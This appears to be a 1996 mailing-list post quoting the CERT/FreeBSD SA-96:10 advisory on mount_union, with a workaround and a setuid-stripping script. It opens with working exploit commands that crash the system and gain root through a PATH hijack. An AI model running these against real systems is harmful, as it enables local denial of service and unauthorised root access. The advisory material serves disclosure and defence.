Looks like FreeBSD can't find a patch for this bad boy:

FreeBSD has a security hole...
mount_union is dangerous if suid is set

vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable

to crash system (as a normal user) try this:

    mkdir a
    mkdir b
    mount_union ~/a ~/b
    mount_union -b ~/a ~/b

to get euid try this:

    export PATH=/tmp:$PATH      #if zsh, of course
    echo /bin/sh >/tmp/modload
    chmod +x /tmp/modload
    mount_union /dir1 /dir2

and You are root!

> =============================================================================
> CERT(sm) Vendor-Initiated Bulletin VB-96.07
> May 21, 1996
>
> Topic: system stability compromise via mount_union program
> Source: The FreeBSD Project, Inc.
>
> To aid in the wide distribution of essential security information, the CERT
> Coordination Center is forwarding the following information from the Free BSD
> Project, Inc. The FreeBSD Project urges you to act on this information as soon
> as possible. Their contact information is included in the forwarded text
> below; please contact them if you have any questions or need further
> information.
>
> ========================FORWARDED TEXT STARTS HERE============================
> =============================================================================
> FreeBSD-SA-96:10                                            Security Advisory
>                                                     The FreeBSD Project, Inc.
>
> Topic:        system stability compromise via mount_union program
>
> Category:     core
> Module:       unionfs
> Announced:    1996-05-17
> Affects:      FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current
> Corrected:    (workaround) 2.1-stable and 2.2-current as of 1996-05-17
> Source:       4.4BSD (lite)
> FreeBSD only: no
>
> Patches:      ftp://freebsd.org/pub/CERT/patches/SA-96:10/
>
> =============================================================================
>
> I. Background
>
>    A bug was found in the union file system code which can allow
>    an unprivileged local user to compromise system stability.
>    This problem is present in all source code and binary
>    distributions of FreeBSD version 2.x released before 1996-05-18.
>
>    All FreeBSD users are encouraged to use the workaround provided
>    until the FreeBSD Project distributes a full solution.
>
>
> II. Problem Description
>
>    The union filesystem code had problems with certain mount ordering
>    problems. By executing a certain sequence of mount_union commands,
>    an unprivileged local user may cause a system reload.
>
>    NOTE: This is a different problem than the one discussed in
>    FreeBSD SA-96:09. The workaround for this vulnerability is
>    similar to the one discussed in 96:09, but the proper solution
>    for the unauthorized access problem in 96:09 does not address
>    this vulnerability.
>
>
> III. Impact
>
>    The problem could allow local users to compromise system stability.
>
>    This vulnerability can only be exploited by users with a valid
>    account on the local system.
>
>
> IV. Solution(s)
>
>    The FreeBSD project is currently developing a solution to this
>    problem, however the proper solution will not be available until
>    a future FreeBSD release. We do not anticipate releasing patches
>    for previous versions of FreeBSD due to the extensive nature of this
>    fix. This security advisory will be updated as new information is
>    made available.
>
> V. Workaround
>
>    This vulnerability can quickly and easily be limited by removing
>    the setuid permission bit from the mount_union program. This
>    workaround will work for all versions of FreeBSD affected by
>    this problem.
>
>    As root, execute the command:
>
>        % chmod u-s /sbin/mount_union
>
>    then verify that the setuid permissions of the files have been
>    removed.
>    The permissions array should read "-r-xr-xr-x" as
>    shown here:
>
>        % ls -l /sbin/mount_union
>        -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union
>
>    In addition to changing the permissions on the executable files,
>    if you have the source code installed, we suggest patching the
>    sources so that mount_union will not be installed with the
>    setuid bit set:
>
> *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 > --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 > *************** > *** 8,14 **** > CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} > .PATH: ${MOUNT} > > - BINOWN= root > - BINMODE=4555 > - > .include > --- 8,11 ----
>
> =============================================================================
> The FreeBSD Project, Inc.
>
> Web Site:                   http://www.freebsd.com/
> Confidential contacts:      security-officer@freebsd.org
> PGP Key:                    ftp://freebsd.org/pub/CERT/public_key.asc
> Security notifications:     security-notifications@freebsd.org
> Security public discussion: security@freebsd.org
>
> Notice: Any patches in this document may not apply cleanly due to
>         modifications caused by digital signature or mailer software.
>         Please reference the URL listed at the top of this document
>         for original copies of all patches if necessary.
> =============================================================================
>
> =========================FORWARDED TEXT ENDS HERE=============================
>
> If you believe that your system has been compromised, contact the CERT
> Coordination Center or your representative in the Forum of Incident Response
> and Security Teams (FIRST).
>
> We strongly urge you to encrypt any sensitive information you send by email.
> The CERT Coordination Center can support a shared DES key and PGP. Contact the
> CERT staff for more information.
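Review bot: in the /usr/src/sbin/mount_union/Makefile hunk quoted above, dropping `BINOWN= root` and `BINMODE=4555` leaves nothing in the Makefile that says why mount_union must not be installed setuid; a one-line comment at that spot citing SA-96:10 would keep the mode from being restored later. The change only affects future installs, so the `chmod u-s /sbin/mount_union` step is still needed for the binary already on disk. The trailing context line reads `.include` with no argument in this copy, so take the patch from the advisory's Patches URL instead of applying the quoted text.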
>
> Location of CERT PGP key
>          ftp://info.cert.org/pub/CERT_PGP.key
>
>
> CERT Contact Information
> - ------------------------
> Email    cert@cert.org
>
> Phone    +1 412-268-7090 (24-hour hotline)
>          CERT personnel answer 8:30-5:00 p.m. EST
>          (GMT-5)/EDT(GMT-4), and are on call for
>          emergencies during other hours.
>
> Fax      +1 412-268-6989
>
> Postal address
>          CERT Coordination Center
>          Software Engineering Institute
>          Carnegie Mellon University
>          Pittsburgh PA 15213-3890
>          USA
>
> CERT publications, information about FIRST representatives, and other
> security-related information are available from
>          http://www.cert.org/
>          ftp://info.cert.org/pub/
>
> CERT advisories and bulletins are also posted on the USENET newsgroup
>          comp.security.announce
>
> To be added to our mailing list for CERT advisories and bulletins, send your
> email address to
>          cert-advisory-request@cert.org
>
>
> CERT is a service mark of Carnegie Mellon University.
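The workaround in section V of the quoted advisory, as an added shell example that is not part of the original message or of FreeBSD's own tooling: it strips the setuid bit from each path given on the command line and re-checks the mode afterwards. The function names are made up for this example; /sbin/mount_union is the path the advisory names.

```shell
#!/bin/sh
# Added example: apply and verify the advisory's "chmod u-s" workaround.
# Usage (as root): sh strip_setuid.sh /sbin/mount_union

# Print the 10-character permission string, e.g. "-r-sr-xr-x".
perm_string() {
    ls -ld -- "$1" | cut -c1-10
}

# Return 0 if the owner-execute slot shows setuid ("s" or "S").
has_setuid() {
    case "$(perm_string "$1")" in
        ???[sS]*) return 0 ;;
        *) return 1 ;;
    esac
}

# Strip setuid from one file and confirm the result.
# Status: 0 = no setuid (already, or after the fix), 1 = skipped, 2 = fix failed.
strip_setuid() {
    f=$1
    # Only touch regular files; a symlink could point somewhere unexpected.
    if [ -L "$f" ] || [ ! -f "$f" ]; then
        echo "skip: $f is not a regular file" >&2
        return 1
    fi
    if ! has_setuid "$f"; then
        echo "ok: $f $(perm_string "$f")"
        return 0
    fi
    echo "setuid: $f $(perm_string "$f")"
    chmod u-s -- "$f" || return 2
    # Re-read the mode instead of trusting chmod's exit status alone.
    if has_setuid "$f"; then
        echo "FAILED: $f still $(perm_string "$f")" >&2
        return 2
    fi
    echo "fixed: $f $(perm_string "$f")"
    return 0
}

# Process every path given on the command line.
for target in "$@"; do
    strip_setuid "$target"
done
```

On a file installed with mode 4555, as in the Makefile the advisory patches, the permission string after the fix is the "-r-xr-xr-x" the advisory tells you to look for.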